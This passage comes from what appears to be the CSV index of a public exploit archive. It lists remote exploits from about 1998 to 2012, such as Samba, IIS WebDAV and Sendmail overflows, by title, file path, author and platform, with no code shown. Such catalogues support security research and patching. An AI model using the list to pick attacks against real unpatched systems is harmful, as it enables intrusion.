Disclosure",2002-11-08,"Tamer Sahin",windows,remote, -22007,exploits/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote, -22012,exploits/linux/remote/22012.c,"Light HTTPd 0.1 - GET Buffer Overflow (1)",2002-11-12,Xpl017Elz,linux,remote, -22013,exploits/linux/remote/22013.c,"Light HTTPd 0.1 - GET Buffer Overflow (2)",2002-11-12,uid0x00,linux,remote, -22016,exploits/linux/remote/22016.c,"LibHTTPD 1.2 - POST Buffer Overflow",2002-11-13,Xpl017Elz,linux,remote, -22018,exploits/windows/remote/22018.pl,"Key Focus KF Web Server 1.0.8 - Directory Traversal",2002-11-13,mattmurphy,windows,remote, -22020,exploits/multiple/remote/22020.pl,"Perception LiteServe 2.0 - CGI Source Disclosure",2002-11-14,mattmurphy,multiple,remote, -22021,exploits/linux/remote/22021.sh,"Lonerunner Zeroo HTTP Server 1.5 - Remote Buffer Overflow",2002-11-16,"dong-h0un U",linux,remote, -22022,exploits/windows/remote/22022.txt,"Macromedia Flash 6.0.47.0 - SWRemote Heap Corruption",2002-11-18,LOM,windows,remote, -22023,exploits/windows/remote/22023.c,"MailEnable 1.501x - Email Server Buffer Overflow",2002-11-18,redsand,windows,remote, -22024,exploits/windows/remote/22024.txt,"TFTPD32 2.50 - Arbitrary File Download/Upload",2002-11-18,"Aviram Jenik",windows,remote, -22025,exploits/windows/remote/22025.pl,"TFTPD32 2.50 - 'Filename' Remote Buffer Overflow",2002-11-19,"Aviram Jenik",windows,remote, -22026,exploits/linux/remote/22026.txt,"Mhonarc 2.5.x - Mail Header HTML Injection",2002-11-19,"Steven Christey",linux,remote, -22027,exploits/windows/remote/22027.txt,"Microsoft Java Virtual Machine 3802 Series - Bytecode Verifier",2002-11-21,"Last Stage of Delirium",windows,remote, -22028,exploits/windows/remote/22028.txt,"Symantec Java! JustInTime Compiler 210.65 - Command Execution",2002-11-21,"Last Stage of Delirium",windows,remote, -22029,exploits/multiple/remote/22029.txt,"Sun/Netscape Java Virtual Machine1.x - Bytecode Verifier",2002-11-21,"Last Stage of Delirium",multiple,remote, -22032,exploits/windows/remote/22032.txt,"acFTP 1.4 - Invalid Password Weak Authentication",2002-11-25,"Matthew Murphy",windows,remote, -22034,exploits/linux/remote/22034.pl,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption (1)",2002-11-25,"Damian Myerscough",linux,remote, -22035,exploits/linux/remote/22035.c,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption (2)",2002-11-25,Xpl017Elz,linux,remote, -22036,exploits/unix/remote/22036.pl,"XFree86 X11R6 3.3.x - Font Server Remote Buffer Overrun",2002-11-25,"TESO Security",unix,remote, -22046,exploits/linux/remote/22046.c,"Null HTTPd 0.5 - Remote Heap Corruption",2002-11-26,eSDee,linux,remote, -22049,exploits/unix/remote/22049.c,"Lib CGI 0.1 - Include Buffer Overflow",2002-11-27,Xpl017Elz,unix,remote, -22054,exploits/cgi/remote/22054.c,"Boozt Standard 0.9.8 - 'index.cgi' Buffer Overrun",2002-11-29,BrainStorm,cgi,remote, -22057,exploits/linux/remote/22057.pl,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (1)",2002-11-30,Sapient2003,linux,remote, -22058,exploits/linux/remote/22058.c,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (2)",2002-11-30,jsk,linux,remote, -22063,exploits/linux/remote/22063.c,"Zeroo HTTP Server 1.5 - Directory Traversal (1)",2002-11-22,mikecc,linux,remote, -22064,exploits/linux/remote/22064.pl,"Zeroo HTTP Server 1.5 - Directory Traversal (2)",2002-11-22,mattmurphy,linux,remote, -22078,exploits/windows/remote/22078.txt,"Mollensoft Software Enceladus Server Suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote, -22082,exploits/windows/remote/22082.pl,"Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow",2002-12-10,"Joel Soderberg",windows,remote, -22084,exploits/unix/remote/22084.c,"MySQL 3.23.x/4.0.x - 'COM_CHANGE_USER' Password Length Account",2002-12-16,Andi,unix,remote, -22085,exploits/unix/remote/22085.txt,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Memory Corruption",2002-12-12,"Stefan Esser",unix,remote, -22091,exploits/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 - Format String",2002-12-16,"Marceta Milos",linux,remote, -22093,exploits/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection",2012-10-19,xistence,multiple,remote, -22094,exploits/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)",2012-10-19,xistence,windows,remote, -22101,exploits/linux/remote/22101.c,"zkfingerd 0.9.1 - 'say()' Format String",2002-12-16,"Marceta Milos",linux,remote, -22106,exploits/linux/remote/22106.txt,"CUPS 1.1.x - Negative Length HTTP Header",2002-12-19,iDefense,linux,remote, -22112,exploits/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 - Information Disclosure",2002-12-30,"Dennis Rand",windows,remote, -22113,exploits/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion",2002-12-30,"Dennis Rand",windows,remote, -22129,exploits/linux/remote/22129.c,"H-Sphere WebShell 2.4 - Remote Command Execution",2003-01-06,"Carl Livitt",linux,remote, -22130,exploits/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,multiple,remote, -22131,exploits/bsd/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",bsd,remote, -22135,exploits/linux/remote/22135.c,"TANne 0.6.17 - Session Manager SysLog Format String",2003-01-07,"dong-h0un yoU",linux,remote, -22136,exploits/windows/remote/22136.txt,"PlatinumFTPServer 1.0.6 - Directory Traversal",2003-01-07,"Dennis Rand",windows,remote, -22138,exploits/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow",2003-01-10,greuff@void.at,multiple,remote, -22139,exploits/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String",2003-01-10,greuff@void.at,multiple,remote, -22140,exploits/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String",2003-01-10,greuff@void.at,multiple,remote, -22141,exploits/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin - Remote Format String",2003-01-10,greuff,linux,remote, -22142,exploits/windows/remote/22142.c,"Half-Life 1.1 Client - Server Message Format String",2003-01-10,greuff,windows,remote, -22143,exploits/linux/remote/22143.txt,"BRS Webweaver 1.0 1 - MKDir Directory Traversal",2003-01-10,euronymous,linux,remote, -22144,exploits/windows/remote/22144.txt,"Xynph FTP Server 1.0 - Directory Traversal",2003-01-11,"Zero-X www.lobnan.de Team",windows,remote, -22145,exploits/multiple/remote/22145.txt,"BitMover BitKeeper 3.0 - Daemon Mode Remote Command Execution",2003-01-11,"Maurycy Prodeus",multiple,remote, -22147,exploits/linux/remote/22147.c,"mpg123 pre0.59s - Invalid MP3 Header Memory Corruption",2003-01-13,"Gobbles Security",linux,remote, -22161,exploits/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 - PORT Overflow (Metasploit)",2012-10-23,Metasploit,windows,remote,21 -22171,exploits/windows/remote/22171.txt,"Trend Micro OfficeScan 3.x - CGI Directory Insufficient Permissions",2003-01-15,"Rod Boron",windows,remote, -22173,exploits/windows/remote/22173.txt,"Trend Micro Virus Control System 1.8 - Information Disclosure",2003-01-15,"Rod Boron",windows,remote, -22174,exploits/windows/remote/22174.txt,"Trend Micro ScanMail For Exchange 3.8 - Authentication Bypass",2003-01-15,"Rod Boron",windows,remote, -22178,exploits/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 - Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote, -22179,exploits/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946b - Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote, -22184,exploits/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote, -22185,exploits/windows/remote/22185.txt,"Sambar Server 5.x - 'results.stm' Cross-Site Scripting",2003-01-20,galiarept,windows,remote, -22187,exploits/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double-Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote, -22194,exploits/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4.0 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote, -22200,exploits/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",multiple,remote, -22201,exploits/multiple/remote/22201.txt,"List Site Pro 2.0 - User Database Delimiter Injection",2003-01-24,Statix,multiple,remote, -22205,exploits/linux/remote/22205.txt,"Apache Tomcat 3.x - Null Byte Directory / File Disclosure",2003-01-26,"Jouko Pynnönen",linux,remote, -22213,exploits/windows/remote/22213.txt,"Opera 7.0 - JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",windows,remote, -22217,exploits/windows/remote/22217.txt,"Opera 7 - Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",windows,remote, -22218,exploits/windows/remote/22218.txt,"Opera 7.0 - History Object Information Disclosure",2003-02-04,"GreyMagic Software",windows,remote, -22219,exploits/windows/remote/22219.txt,"Opera 7.0 - Error Message History Disclosure",2003-02-04,"GreyMagic Software",windows,remote, -22224,exploits/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 - URL Directory Traversal",2003-02-05,"Auriemma Luigi",multiple,remote, -22226,exploits/windows/remote/22226.txt,"Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution",2003-02-05,"Andreas Sandblad",windows,remote, -22229,exploits/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 - Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",windows,remote, -22236,exploits/hardware/remote/22236.txt,"NETGEAR FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,hardware,remote, -22244,exploits/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",hardware,remote, -22251,exploits/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Remote Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote, -22264,exploits/linux/remote/22264.txt,"OpenSSL 0.9.x - CBC Error Information Leakage",2003-02-19,"Martin Vuagnoux",linux,remote, -22269,exploits/windows/remote/22269.txt,"Sage 1.0 Beta 3 - Content Management System Full Path Disclosure",2003-02-20,euronymous,windows,remote, -22270,exploits/windows/remote/22270.txt,"Sage 1.0 Beta 3 - Content Management System Cross-Site Scripting",2003-02-20,euronymous,windows,remote, -22271,exploits/hardware/remote/22271.c,"Cisco IOS 11/12 - OSPF Neighbor Buffer Overflow",2003-02-20,FX,hardware,remote, -22274,exploits/linux/remote/22274.c,"Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (2)",2003-02-23,CrZ,linux,remote, -22275,exploits/linux/remote/22275.pl,"Webmin 0.9x / Usermin 0.9x/1.0 - Unauthenticated Access Session ID Spoofing",2003-02-20,"Carl Livitt",linux,remote, -22278,exploits/linux/remote/22278.pl,"moxftp 2.2 - Banner Parsing Buffer Overflow",2003-02-24,"Knud Erik Hojgaard",linux,remote, -22280,exploits/windows/remote/22280.txt,"Microsoft Outlook2000/Express 6.0 - Arbitrary Program Execution",2003-02-24,http-equiv,windows,remote, -22288,exploits/windows/remote/22288.txt,"Microsoft Internet Explorer 5/6 - Self Executing HTML File",2003-02-25,http-equiv,windows,remote, -22289,exploits/windows/remote/22289.c,"Microsoft Windows XP/ME - Help and Support Center Buffer Overflow",2003-02-26,s0h,windows,remote, -22291,exploits/linux/remote/22291.c,"AMX Mod 0.9.2 - Remote 'amx_say' Format String",2003-02-26,greuff,linux,remote, -22292,exploits/unix/remote/22292.pl,"Frisk F-Prot AntiVirus 3.12b - Command Line Scanner Buffer Overflow",2003-02-26,"Knud Erik Hojgaard",unix,remote, -22296,exploits/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",multiple,remote, -22301,exploits/windows/remote/22301.html,"Aladdin Knowledge System Ltd - 'PrivAgent.ocx' ChooseFilePath Buffer Overflow",2012-10-28,b33f,windows,remote, -22304,exploits/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection (Metasploit)",2012-10-28,Metasploit,multiple,remote, -22305,exploits/windows/remote/22305.rb,"HP Operations Agent - Opcode 'coda.exe' 0x8c Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote, -22306,exploits/windows/remote/22306.rb,"HP Operations Agent - Opcode 'coda.exe' 0x34 Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote, -22311,exploits/cgi/remote/22311.txt,"Axis Communications Video Server 2.x - 'Command.cgi' File Creation",2003-02-28,"Martin Eiszner",cgi,remote, -22312,exploits/cgi/remote/22312.txt,"Apple QuickTime/Darwin Streaming Server 4.1.x - 'parse_xml.cgi' File Disclosure",2003-02-28,"Joe Testa",cgi,remote, -22313,exploits/unix/remote/22313.c,"Sendmail 8.12.x - Header Processing Buffer Overflow (1)",2003-03-02,"Last Stage of Delirium",unix,remote, -22314,exploits/unix/remote/22314.c,"Sendmail 8.12.x - Header Processing Buffer Overflow (2)",2003-03-02,bysin,unix,remote, -22319,exploits/hardware/remote/22319.txt,"HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",hardware,remote, -22327,exploits/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall - Content Filter Bypassing",2003-03-05,bit_logic,multiple,remote, -22338,exploits/windows/remote/22338.txt,"Clearswift MAILsweeper 4.x - MIME Attachment Filter Bypass",2003-03-07,http-equiv,windows,remote, -22341,exploits/windows/remote/22341.txt,"Opera 6.0/7.0 - 'Filename Download' Buffer Overrun",2003-03-10,nesumin,windows,remote, -22342,exploits/linux/remote/22342.c,"Qpopper 4.0.x - Remote Memory Corruption",2003-03-10,"Florian Heinz",linux,remote, -22346,exploits/linux/remote/22346.c,"PGP4Pine 1.75.6/1.76 - 'Message Line' Remote Buffer Overflow",2003-03-12,"Eric AUGE",linux,remote, -22350,exploits/hardware/remote/22350.txt,"Nokia SGSN DX200 - Remote SNMP Information Disclosure",2003-03-13,"Ollie Whitehouse",hardware,remote, -22351,exploits/windows/remote/22351.py,"Freefloat FTP Server - 'PUT' Remote Buffer Overflow",2012-10-30,"Jacob Holcomb",windows,remote, -22353,exploits/linux/remote/22353.c,"BitchX 1.0 - Remote 'Send_CTCP()' Memory Corruption",2003-03-06,eSDee,linux,remote, -22355,exploits/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure",2003-03-14,sir.mordred@hushmail.com,cgi,remote, -22356,exploits/unix/remote/22356.c,"Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote, -22361,exploits/linux/remote/22361.cpp,"Qpopper 3/4 - 'Username' Information Disclosure",2003-03-11,plasmahh,linux,remote, -22365,exploits/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1)",2003-03-24,mat,windows,remote, -22366,exploits/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote, -22367,exploits/windows/remote/22367.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3)",2003-04-04,"Morning Wood",windows,remote, -22368,exploits/windows/remote/22368.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4)",2003-03-17,aT4r@3wdesign.es,windows,remote, -22369,exploits/linux/remote/22369.txt,"Ximian Evolution 1.x - UUEncoding Parsing Memory Corruption",2003-03-17,"Core Security",linux,remote, -22371,exploits/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion",2003-03-19,"Core Security",linux,remote, -22375,exploits/windows/remote/22375.rb,"Aladdin Knowledge System Ltd - 'ChooseFilePath' Remote Buffer Overflow (Metasploit)",2012-11-01,Metasploit,windows,remote, -22379,exploits/linux/remote/22379.c,"PXE Server 2.0 - Remote Buffer Overrun",2003-03-13,CrZ,linux,remote, -22381,exploits/multiple/remote/22381.txt,"SIPS 0.2.2 - User Information Disclosure",2003-03-18,dwcgr0up,multiple,remote, -22388,exploits/multiple/remote/22388.txt,"WFChat 1.0 - Information Disclosure",2003-03-19,subj,multiple,remote, -22394,exploits/hardware/remote/22394.txt,"Check Point FW-1 Syslog Daemon - Unfiltered Escape Sequence",2003-03-21,"Dr. Peter Bieringer",hardware,remote, -22409,exploits/multiple/remote/22409.txt,"Simple Chat 1.x - User Information Disclosure",2003-03-21,subj,multiple,remote, -22410,exploits/multiple/remote/22410.pl,"ProtWare HTML Guardian 6.x - Encryption",2003-03-21,rain_song,multiple,remote, -22416,exploits/hardware/remote/22416.txt,"3Com SuperStack II RAS 1500 - Unauthorized Access",2003-03-24,"Piotr Chytla",hardware,remote, -22418,exploits/windows/remote/22418.c,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (2)",2003-04-30,ThreaT,windows,remote, -22432,exploits/windows/remote/22432.rb,"HP Intelligent Management Center UAM - Remote Buffer Overflow (Metasploit)",2012-11-04,Metasploit,windows,remote, -22434,exploits/windows/remote/22434.txt,"Sambar Server 5.x - Information Disclosure",2003-03-27,"gregory Le Bras",windows,remote, -22448,exploits/windows/remote/22448.txt,"BEA WebLogic 7.0 - Hostname/NetBIOS Name Remote Information Disclosure",2003-04-02,"Michael Hendrickx",windows,remote, -22449,exploits/unix/remote/22449.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (1)",2003-04-02,Xpl017Elz,unix,remote, -22450,exploits/unix/remote/22450.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (2)",2003-04-02,Xpl017Elz,unix,remote, -22453,exploits/hardware/remote/22453.txt,"NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,hardware,remote, -22454,exploits/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",linux,remote, -22455,exploits/hardware/remote/22455.txt,"NETGEAR FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,hardware,remote, -22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",multiple,remote, -22466,exploits/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - Remote Stack Overflow ROP-Based (SEH) (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote, -22468,exploits/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,unix,remote, -22469,exploits/unix/remote/22469.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)",2003-04-07,c0wboy,unix,remote, -22470,exploits/unix/remote/22470.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)",2003-05-12,eDSee,unix,remote, -22471,exploits/unix/remote/22471.txt,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)",2003-04-07,noir,unix,remote, -22472,exploits/multiple/remote/22472.txt,"Vignette StoryServer 4.1 - Sensitive Stack Memory Information Disclosure",2003-04-07,@stake,multiple,remote, -22475,exploits/unix/remote/22475.txt,"Amavis 0.1.6 - Header Parsing Mail Relaying",2003-04-08,"Phil Cyc",unix,remote, -22476,exploits/windows/remote/22476.txt,"QuickFront 1.0 - File Disclosure",2003-04-09,"Jan Kachlik",windows,remote, -22479,exploits/linux/remote/22479.c,"PoPToP PPTP 1.0/1.1.x - Negative 'read()' Argument Remote Buffer Overflow",2003-04-09,"John Leach",linux,remote, -22480,exploits/hardware/remote/22480.txt,"Linksys BEFVP4 - SNMP Community String Information Disclosure",2003-04-09,"Branson Matheson",hardware,remote, -22485,exploits/linux/remote/22485.c,"SheerDNS 1.0 - Information Disclosure",2003-04-14,"Jedi/Sector One",linux,remote, -22488,exploits/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 - site.ini Information Disclosure",2003-04-15,"gregory Le Bras",windows,remote, -22496,exploits/multiple/remote/22496.txt,"Python 2.2/2.3 - Documentation Server Error Page Cross-Site Scripting",2003-04-15,euronymous,multiple,remote, -22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",multiple,remote, -22504,exploits/windows/remote/22504.txt,"Cerberus FTP Server 2.1 - Information Disclosure",2003-04-16,"Ziv Kamir",windows,remote, -22506,exploits/windows/remote/22506.txt,"EZ Server 1.0 - File Disclosure",2003-04-17,"gregory Le Bras",windows,remote, -22509,exploits/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",multiple,remote, -22511,exploits/windows/remote/22511.txt,"Working Resources 1.7.x/2.15 BadBlue - 'ext.dll' Command Execution",2003-04-20,"Matthew Murphy",windows,remote, -22515,exploits/windows/remote/22515.txt,"AN HTTPD 1.x - Count.pl Directory Traversal",2003-04-22,"Matthew Murphy",windows,remote, -22522,exploits/multiple/remote/22522.pl,"Web Protector 2.0 - Trivial Encryption",2003-04-22,rjfix,multiple,remote, -22570,exploits/windows/remote/22570.java,"Microsoft Windows Media Player 7.1 - Skin File Code Execution",2003-05-07,"Jelmer Kuperus",windows,remote, -22525,exploits/windows/remote/22525.rb,"EMC NetWorker - Format String (Metasploit)",2012-11-07,Metasploit,windows,remote, -22526,exploits/windows/remote/22526.rb,"WinRM - VBS Remote Code Execution (Metasploit)",2012-11-07,Metasploit,windows,remote, -22530,exploits/windows/remote/22530.pl,"Microsoft Internet Explorer 5 - Remote 'URLMON.dll' Remote Buffer Overflow",2003-04-23,"Jouko Pynnonen",windows,remote, -22532,exploits/hardware/remote/22532.txt,"IKE - Aggressive Mode Shared Secret Hash Leakage",1999-10-02,"John Pliam",hardware,remote, -22533,exploits/hardware/remote/22533.txt,"Nokia IPSO 3.4.x - Voyager ReadFile.TCL Remote File Reading",2003-04-24,"Jonas Eriksson",hardware,remote, -22541,exploits/cgi/remote/22541.txt,"Alt-N WebAdmin 2.0.x - Remote File Viewing",2003-04-25,david@kamborio.net,cgi,remote, -22542,exploits/cgi/remote/22542.txt,"Alt-N WebAdmin 2.0.x - Remote File Disclosure",2003-04-25,david@kamborio.net,cgi,remote, -22546,exploits/windows/remote/22546.txt,"Opera 7.0/7.10 - JavaScript Console Single Quote Attribute Injection",2003-04-28,nesumin,windows,remote, -22556,exploits/windows/remote/22556.c,"MDG Web Server 4D 3.6 - HTTP Command Buffer Overflow",2003-04-29,badpack3t,windows,remote, -22562,exploits/windows/remote/22562.pl,"Microsoft IIS 5.0 - User Existence Disclosure (1)",1999-02-24,JeiAr,windows,remote, -22563,exploits/windows/remote/22563.pl,"Microsoft IIS 5.0 - User Existence Disclosure (2)",1999-02-24,JeiAr,windows,remote, -22575,exploits/windows/remote/22575.txt,"Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass",2003-05-09,"Marek Bialoglowy",windows,remote, -22584,exploits/linux/remote/22584.txt,"Info-ZIP UnZip 5.50 - Encoded Character Hostile Destination Path",2003-05-10,Jelmer,linux,remote, -22593,exploits/windows/remote/22593.html,"Yahoo! Voice Chat ActiveX Control 1.0.0.43 - Remote Buffer Overflow",2003-05-12,cesaro,windows,remote, -22601,exploits/linux/remote/22601.txt,"Inktomi Traffic Server 4.0/5.x - Cross-Site Scripting",2003-05-14,"Hugo Vazquez",linux,remote, -22604,exploits/windows/remote/22604.txt,"ArGoSoft 1.8.x - Authentication Bypass",2003-05-15,"Ziv Kamir",windows,remote, -22609,exploits/windows/remote/22609.txt,"Snowblind 1.0/1.1 - Web Server File Disclosure",2003-05-16,euronymous,windows,remote, -22611,exploits/multiple/remote/22611.txt,"Netscape Enterprise Server 3.x/4.x - PageServices Information Disclosure",1998-08-16,anonymous,multiple,remote, -22620,exploits/windows/remote/22620.txt,"Working Resources BadBlue 1.7.x/2.x - Unauthorized HTS Access",2003-05-20,mattmurphy,windows,remote, -22622,exploits/linux/remote/22622.txt,"WSMP3 0.0.x - Remote Information Disclosure",2003-05-21,"dong-h0un U",linux,remote, -22623,exploits/linux/remote/22623.txt,"WSMP3 0.0.x - Remote Command Execution",2003-05-21,"dong-h0un U",linux,remote, -22626,exploits/hardware/remote/22626.txt,"Axis Network Camera 2.x - HTTP Authentication Bypass",2003-05-27,"Juliano Rizzo",hardware,remote, -22627,exploits/windows/remote/22627.pl,"Qualcomm Eudora 5.2.1/6.0 - File Attachment Spoofing Variant",2003-05-22,"Paul Szabo",windows,remote, -22630,exploits/osx/remote/22630.txt,"Apple QuickTime/Darwin Streaming MP3Broadcaster - ID3 Tag Handling",2003-05-22,"Sir Mordred",osx,remote, -22631,exploits/windows/remote/22631.txt,"IISProtect 2.1/2.2 - Authentication Bypass",2003-05-22,iDefense,windows,remote, -22635,exploits/windows/remote/22635.c,"Magic Winmail Server 2.3 USER POP3 - Command Format String",2003-05-23,D4rkGr3y,windows,remote, -22636,exploits/windows/remote/22636.txt,"EServ 2.9x - Directory Indexing",2003-05-23,D4rkGr3y,windows,remote, -22646,exploits/unix/remote/22646.txt,"Vignette 4.x/5.0 - Memory Disclosure",2003-05-26,S21Sec,unix,remote, -22648,exploits/unix/remote/22648.txt,"Vignette 4/5 - Cross-Site Scripting",2003-05-26,"Ramon Pinuaga Cascales",unix,remote, -22649,exploits/multiple/remote/22649.txt,"P-News 1.16 - Administrative Account Creation",2003-05-24,"Peter Winter-Smith",multiple,remote, -22657,exploits/multiple/remote/22657.rb,"Java Applet - JAX-WS Remote Code Execution (Metasploit)",2012-11-13,Metasploit,multiple,remote, -22658,exploits/linux/remote/22658.pl,"Batalla Naval 1.0 4 - Remote Buffer Overflow (1)",2003-05-26,wsxz,linux,remote, -22659,exploits/linux/remote/22659.c,"Batalla Naval 1.0 4 - Remote Buffer Overflow (2)",2003-05-26,jsk,linux,remote, -22662,exploits/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 - HTML Attachment Cross-Site Scripting",2003-05-27,KernelPanikLabs,multiple,remote, -22664,exploits/windows/remote/22664.txt,"Sun ONE Application Server 7.0 - Source Disclosure",2003-05-27,"SPI Labs",windows,remote, -22665,exploits/windows/remote/22665.txt,"Sun ONE Application Server 7.0 - Error Message Cross-Site Scripting",2003-05-27,"SPI Labs",windows,remote, -22674,exploits/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 - Full Path Disclosure",2003-05-29,JeiAr,windows,remote, -22676,exploits/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe?css' Cross-Site Scripting",2003-05-29,JeiAr,windows,remote, -22677,exploits/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe?css' Cross-Site Scripting",2003-05-29,JeiAr,windows,remote, -22678,exploits/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote, -22686,exploits/php/remote/22686.rb,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit)",2012-11-13,Metasploit,php,remote, -22691,exploits/windows/remote/22691.txt,"pablo software Solutions baby ftp server 1.2 - Directory Traversal",2003-05-29,dr_insane,windows,remote, -22696,exploits/php/remote/22696.txt,"PHP 4.x - Transparent Session ID Cross-Site Scripting",2003-05-30,"Sverre H. Huseby",php,remote, -22699,exploits/unix/remote/22699.c,"Mod_Gzip 1.3.x - Debug Mode",2003-05-06,xCrZx,unix,remote, -22714,exploits/windows/remote/22714.rb,"Oracle Database Client System Analyzer - Arbitrary File Upload (Metasploit)",2012-11-15,Metasploit,windows,remote, -22721,exploits/windows/remote/22721.txt,"Pablo Software Solutions FTP Service 1.2 - Anonymous Users Privileges",2003-06-03,JeiAr,windows,remote, -22722,exploits/windows/remote/22722.txt,"Pablo Software Solutions FTP Service 1.2 - Plaintext Password",2003-06-03,JeiAr,windows,remote, -22723,exploits/windows/remote/22723.txt,"MegaBrowser 0.3 - HTTP Directory Traversal",2003-06-04,JeiAr,windows,remote, -22726,exploits/windows/remote/22726.txt,"Microsoft Internet Explorer 5 - OBJECT Tag Buffer Overflow",2003-06-04,FelineMenace,windows,remote, -22728,exploits/windows/remote/22728.txt,"Microsoft Internet Explorer 5 - Classic Mode FTP Client Cross Domain Scripting",2003-06-04,"Matthew Murphy",windows,remote, -22733,exploits/hp-ux/remote/22733.c,"HP-UX FTPD 1.1.214.4 - REST Command Memory Disclosure",2003-06-05,di0aD,hp-ux,remote, -22734,exploits/windows/remote/22734.html,"Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution",2003-06-05,"Eiji James Yoshida",windows,remote, 